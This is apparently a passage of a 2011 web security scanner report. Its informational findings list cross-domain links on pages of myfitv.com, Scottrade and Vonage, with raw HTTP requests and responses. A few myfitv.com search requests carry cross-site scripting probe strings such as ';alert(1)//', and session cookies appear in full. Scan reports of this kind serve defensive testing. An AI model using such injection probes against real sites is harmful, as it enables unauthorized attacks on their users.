...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:h1LGsTid0bgJ:www.ooma.com/+telephone+service&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CJcBECAwAw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vonage.com/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CJwBEBYwBA')">Vonage VoIP <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:sUetFOlb1KAJ:www.vonage.com/+telephone+service&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CJ4BECAwBA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.vonage.com/?login" onmousedown="return clk(this,this.href,'','','','5','','0CKEBENICKAAwBA')">My Account / Login</a> - <a href="https://support.vonage.com/app/answers/detail/a_id/1381/~/contact-us" onmousedown="return clk(this,this.href,'','','','5','','0CKIBENICKAEwBA')">Contact Us</a> - <a href="http://www.vonage.com/us-canada-calling-plans/" onmousedown="return clk(this,this.href,'','','','5','','0CKMBENICKAIwBA')">Calling Plans</a> - <a href="http://www.vonage.com/world-calling-plans/" onmousedown="return clk(this,this.href,'','','','5','','0CKQBENICKAMwBA')">International Calling Plans</a>
...[SNIP]...
<h3 class="r"><a href="http://www.connectmyphone.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CKoBEBYwBQ')">Order <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:V8A2vFsWtAMJ:www.connectmyphone.com/+telephone+service&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CKwBECAwBQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.steelecommerce.com/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CLEBEBYwBg')">Local &amp; Internet <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:IPvEGgh7oRIJ:www.steelecommerce.com/+telephone+service&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CLMBECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.comcast.com/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CLgBEBYwBw')">Comcast Official Site | Deals on High-Speed Internet, Cable, <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:NuXImFF98C8J:www.comcast.com/+telephone+service&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CLoBECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Telephone_company" class=l onmousedown="return clk(this,this.href,'','','','9','','0CMEBEBYwCA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:0hc_Zq3drMMJ:en.wikipedia.org/wiki/Telephone_company+telephone+service&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CMMBECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cavtel.com/home-services/products/phone/phone-service/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CMgBEBYwCQ')">Home <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:wDixXkNs_JYJ:www.cavtel.com/home-services/products/phone/phone-service/+telephone+service&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CMoBECAwCQ')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.smh.com.au/business/phone-company-licence-breaches-could-cost-1m-under-conroy-plan-20110905-1ju3c.html" class=l onmousedown="return clk(this,this.href,'','','','11','','0CM4BEKkCMAo')"><em>
...[SNIP]...
<span class=tl><a href="http://blogs.wsj.com/digits/2011/09/05/netflix-ceo-looks-beyond-starz-deal/" class=l onmousedown="return clk(this,this.href,'','','','12','','0CNQBEKkCMAs')">Netflix CEO Looks Beyond Starz Deal</a>
...[SNIP]...
<span class=tl><a href="http://www.chron.com/news/article/Phone-restoration-continues-in-Vermont-after-Irene-2155133.php" class=l onmousedown="return clk(this,this.href,'','','','13','','0CNoBEKkCMAw')"><em>
...[SNIP]...

15.119. http://www.myfitv.com/javascripts/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /javascripts/all.js

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /javascripts/all.js?1314990512 HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Tue, 06 Sep 2011 12:45:30 GMT
ETag: "64fd2-551ae-4abfa1659cc00"-gzip
Last-Modified: Fri, 02 Sep 2011 19:08:32 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 348590

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
<a class="more_info_link"><img class="button top" src="http://fitv-static.s3.amazonaws.com/more_info' + image_extension + '"/></a>
...[SNIP]...

15.120. http://www.myfitv.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /search?utf8=%E2%9C%93&query=xss HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:50:36 GMT
ETag: "b06b1c86b03c05bca43a7628c5a0a319"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIiUvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyIPc2Vzc2lvbl9pZCIlNGJlNWEzNzEyYTUxMzU2ZTk3NjdhZGUwZmQ4MGQ1MDg%3D--93112ebe330134a19c07b42f1f52e133e4c4f31d; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.106563
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 30810
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="/videos/236982" onclick="track_navigation('search_video_img')"><img alt="Introduction to the Canon Rebel XSi 450D / XS 1000D" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/51a0KIzDBYL._SX120_SY90_.jpg" video_id="236982" width="120" /></a>
...[SNIP]...
<a href="/videos/576334" onclick="track_navigation('search_video_img')"><img alt="One on One with Cy Waits: XS Nightclub" class="thumbnail" height="90" src="http://pthumbnails.5min.com/5746488/287324358_12.jpg" video_id="576334" width="120" /></a>
...[SNIP]...
<a href="/videos/454547" onclick="track_navigation('search_video_img')"><img alt="Hot Version International - American Touge 2" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/615D0Th6KvL._SX120_SY90_.jpg" video_id="454547" width="120" /></a>
...[SNIP]...
<a href="/videos/454619" onclick="track_navigation('search_video_img')"><img alt="Best Motoring International - American Touge 3" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/61krQR7xOLL._SX160_SY120_.jpg" video_id="454619" width="120" /></a>
...[SNIP]...
<a href="/videos/489359" onclick="track_navigation('search_video_img')"><img alt="Hot Version International - American Touge" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/612lIYYQucL._SX120_SY90_.jpg" video_id="489359" width="120" /></a>
...[SNIP]...
<a href="/videos/687615" onclick="track_navigation('search_video_img')"><img alt="Me and my Shadow Sword" class="thumbnail" height="90" src="http://ecx.images-amazon.com/images/I/517PSd-UWNL._SX120_SY90_.jpg" video_id="687615" width="120" /></a>
...[SNIP]...
<a href="/videos/902148" onclick="track_navigation('search_video_img')"><img alt="Vegas Nightclubs Donate Toys To Kids" class="thumbnail" height="90" src="http://cache.thenewsroom.com/grabnetworks/prod/KVVU5/2010/12/09/0900/story-1_thumb.jpg" video_id="902148" width="120" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/myfitv.com/z300x250;sz=300x250;ord=123456789?" target="_blank" >
   <img src="http://ad.doubleclick.net/ad/myfitv.com/z300x250;sz=300x250;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<a href="/videos/1418289/bachelor-pad-week-4-part-1" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Week 4, Part 1" class="thumbnail" height="90" src="http://thumbnails.hulu.com/943/50171943/50171943_120x90_generated.jpg" video_id="1418289" width="120" /></a>
...[SNIP]...
<a href="/videos/1424891/burn-notice-besieged" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Besieged" class="thumbnail" height="90" src="http://thumbnails.hulu.com/305/40022305/40022305_120x90_generated.jpg" video_id="1424891" width="120" /></a>
...[SNIP]...
<a href="/videos/1425089/friends-with-benefits-the-benefit-of-avoiding-the-mindbanger" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Avoiding the Mindbanger" class="thumbnail" height="90" src="http://thumbnails.hulu.com/973/50171973/50171973_120x90_generated.jpg" video_id="1425089" width="120" /></a>
...[SNIP]...
<a href="/videos/1391790/louie-oh-louie--tickets" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Oh Louie / Tickets" class="thumbnail" height="90" src="http://thumbnails.hulu.com/112/40022112/40022112_120x90_generated.jpg" video_id="1391790" width="120" /></a>
...[SNIP]...
<a href="/videos/1390788/suits-play-the-man" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Play the Man" class="thumbnail" height="90" src="http://thumbnails.hulu.com/164/40022164/40022164_120x90_generated.jpg" video_id="1390788" width="120" /></a>
...[SNIP]...
<a href="/videos/1419176/wilfred-doubt" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Doubt" class="thumbnail" height="90" src="http://thumbnails.hulu.com/375/40031375/40031375_120x90_generated.jpg" video_id="1419176" width="120" /></a>
...[SNIP]...
<a href="/videos/1423467/rookie-blue-a-little-faith" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="A Little Faith" class="thumbnail" height="90" src="http://thumbnails.hulu.com/936/50171936/50171936_120x90_generated.jpg" video_id="1423467" width="120" /></a>
...[SNIP]...
<a href="/videos/1425090/friends-with-benefits-the-benefit-of-being-shallow" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Being Shallow" class="thumbnail" height="90" src="http://thumbnails.hulu.com/972/50171972/50171972_120x90_generated.jpg" video_id="1425090" width="120" /></a>
...[SNIP]...
<div id="footer_social_network_links" align="center">
<a target="_blank" onclick="track_navigation('facebook')" href="http://www.facebook.com/myfitv"><div id="facebook">
...[SNIP]...
</a>
<a target="_blank" onclick="track_navigation('twitter')" href="http://twitter.com/myfitv"><div id="twitter">
...[SNIP]...
<strong><a target="_blank" href="http://www.frontier.com/advertise" onclick="track_navigation('advertise')" style="color:#979797">Advertise with Us</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
<noscript><img src="http://citizenstelecom.112.2o7.net/b/ss/czndevfrontiertv/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

15.121. http://www.myfitv.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?query=XS%EF%BF%BDdace;alert(1)//back HTTP/1.1
Host: www.myfitv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3balert(1)//9336b0fa1c5
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIkYvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyUwMDNkNmNlJyUzYmFsZXJ0KDEpLy85MzM2YjBmYTFjNSIPc2Vzc2lvbl9pZCIlOGU3YzU1NTZjOWE3MTdkM2QzZDIzMDI5ZmE1Y2MyODI%3D--bb6a866ba6baf3100ee2ded8fc9da2d273d6affa; fitvuser=fitvuser_etiamsodalesorciat; __utma=158259878.521147127.1315331722.1315331722.1315331722.1; __utmb=158259878.5.9.1315331746856; __utmc=158259878; __utmz=158259878.1315331722.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=158259878.visitor|1=Arrived=2011-09-06=1; __qca=P0-1156348243-1315331724508; s_cc=true; s_sq=czndevfrontiertv%3D%2526pid%253DSearch%252520-%252520my%252520fitv%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.myfitv.com%25252Fsearch%25253Fquery%25253DXS%252525EF%252525BF%252525BDdace%25253Balert(1)%25252F%25252Fback%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:55:49 GMT
ETag: "fb9f9f1510365fc6d678aaa8ef98dfe9"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIjEvc2VhcmNoP3F1ZXJ5PVhTJUVGJUJGJUJEZGFjZTthbGVydCgxKS8vYmFjayIPc2Vzc2lvbl9pZCIlOGU3YzU1NTZjOWE3MTdkM2QzZDIzMDI5ZmE1Y2MyODI%3D--3cfbab8b31e39a386ecd183bc1bf9078533ad5c0; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.979724
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 28075
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="/videos/717483" onclick="track_navigation('search_video_img')"><img alt="Strange respiratory virus surfaces in dogs in SW Colorado" class="thumbnail" height="90" src="http://cache.thenewsroom.com/kob/2011/03/24/strange_respiratory_viru_DISTRIBUTION_1304708_preview.jpg" video_id="717483" width="120" /></a>
...[SNIP]...
<a href="/videos/776457" onclick="track_navigation('search_video_img')"><img alt="Asst. Police Chief Fired Over Work Environment" class="thumbnail" height="90" src="http://cache.thenewsroom.com/wsmv4/2011/03/30/00001_tmb_1301529248.jpg" video_id="776457" width="120" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/myfitv.com/z300x250;sz=300x250;ord=123456789?" target="_blank" >
   <img src="http://ad.doubleclick.net/ad/myfitv.com/z300x250;sz=300x250;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<a href="/videos/1418289/bachelor-pad-week-4-part-1" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Week 4, Part 1" class="thumbnail" height="90" src="http://thumbnails.hulu.com/943/50171943/50171943_120x90_generated.jpg" video_id="1418289" width="120" /></a>
...[SNIP]...
<a href="/videos/1424891/burn-notice-besieged" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Besieged" class="thumbnail" height="90" src="http://thumbnails.hulu.com/305/40022305/40022305_120x90_generated.jpg" video_id="1424891" width="120" /></a>
...[SNIP]...
<a href="/videos/1425089/friends-with-benefits-the-benefit-of-avoiding-the-mindbanger" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Avoiding the Mindbanger" class="thumbnail" height="90" src="http://thumbnails.hulu.com/973/50171973/50171973_120x90_generated.jpg" video_id="1425089" width="120" /></a>
...[SNIP]...
<a href="/videos/1391790/louie-oh-louie--tickets" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Oh Louie / Tickets" class="thumbnail" height="90" src="http://thumbnails.hulu.com/112/40022112/40022112_120x90_generated.jpg" video_id="1391790" width="120" /></a>
...[SNIP]...
<a href="/videos/1390788/suits-play-the-man" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Play the Man" class="thumbnail" height="90" src="http://thumbnails.hulu.com/164/40022164/40022164_120x90_generated.jpg" video_id="1390788" width="120" /></a>
...[SNIP]...
<a href="/videos/1419176/wilfred-doubt" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="Doubt" class="thumbnail" height="90" src="http://thumbnails.hulu.com/375/40031375/40031375_120x90_generated.jpg" video_id="1419176" width="120" /></a>
...[SNIP]...
<a href="/videos/1423467/rookie-blue-a-little-faith" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="A Little Faith" class="thumbnail" height="90" src="http://thumbnails.hulu.com/936/50171936/50171936_120x90_generated.jpg" video_id="1423467" width="120" /></a>
...[SNIP]...
<a href="/videos/1425090/friends-with-benefits-the-benefit-of-being-shallow" onclick="track_navigation('popular_episodes_daily')" virtual_url="/virtual/popular_episodes_daily"><img alt="The Benefit of Being Shallow" class="thumbnail" height="90" src="http://thumbnails.hulu.com/972/50171972/50171972_120x90_generated.jpg" video_id="1425090" width="120" /></a>
...[SNIP]...
<div id="footer_social_network_links" align="center">
<a target="_blank" onclick="track_navigation('facebook')" href="http://www.facebook.com/myfitv"><div id="facebook">
...[SNIP]...
</a>
<a target="_blank" onclick="track_navigation('twitter')" href="http://twitter.com/myfitv"><div id="twitter">
...[SNIP]...
<strong><a target="_blank" href="http://www.frontier.com/advertise" onclick="track_navigation('advertise')" style="color:#979797">Advertise with Us</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
<noscript><img src="http://citizenstelecom.112.2o7.net/b/ss/czndevfrontiertv/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-7elq8ZYievA_s.gif?labels=myfitv" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

15.122. http://www.scottrade.com/online-trading.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scottrade.com
Path:   /online-trading.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY HTTP/1.1
Host: www.scottrade.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Day-Servlet-Engine/4.1.8
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 12:48:40 GMT
Vary: Accept-Encoding
Content-Length: 41172
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<me
...[SNIP]...
<li><a href="http://www.facebook.com/Scottrade" class="footer-link fb" target="_blank">Facebook</a></li><li><a href="http://twitter.com/scottrade" class="footer-link twitter" target="_blank">Twitter</a>
...[SNIP]...
<li><a href="http://www.youtube.com/scottradeinc" class="footer-link yt" target="_blank">YouTube</a>
...[SNIP]...
<p>Brokerage Products and Services offered by Scottrade, Inc. - Member <a target="_blank" href="http://www.finra.org/">FINRA</a> and <a target="_blank" href="http://www.sipc.org/">SIPC</a>
...[SNIP]...
</a>, and by downloading the <a target="_blank" href="http://www.optionsclearing.com/about/publications/character-risks.jsp">Characteristics and Risks of Standardized Options and Supplements (PDF)</a>
...[SNIP]...
<noscript><iframe src="//ad.wsod.com/action/8bec9b10877d5d7fd7c0fb6e6a631357/38.iframe.action/" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

15.123. http://www.vonage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?login HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; s_nr=1315328331917-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: vpc=1; expires=Fri, 03-Sep-2021 11:58:56 GMT; path=/; domain=.vonage.com
Set-Cookie: oa_event=1; path=/; domain=.vonage.com
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</span>
                   <a href="http://www.vonage.ca" title="Vonage Canada VoIP Internet Phone Service">Canada</a>
...[SNIP]...
</span>
<a href="http://www.twitter.com/vonage" target="_blank">Twitter</a>
...[SNIP]...
</span>
           <a href="http://www.facebook.com/vonage" target="_blank">Facebook</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://vonage.122.2o7.net/b/ss/vonagedev/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<!--iPerceptions-->
<script type="text/javascript" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_layer_Invitation_722.js"></script>
...[SNIP]...

15.124. http://www.vonage.com/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
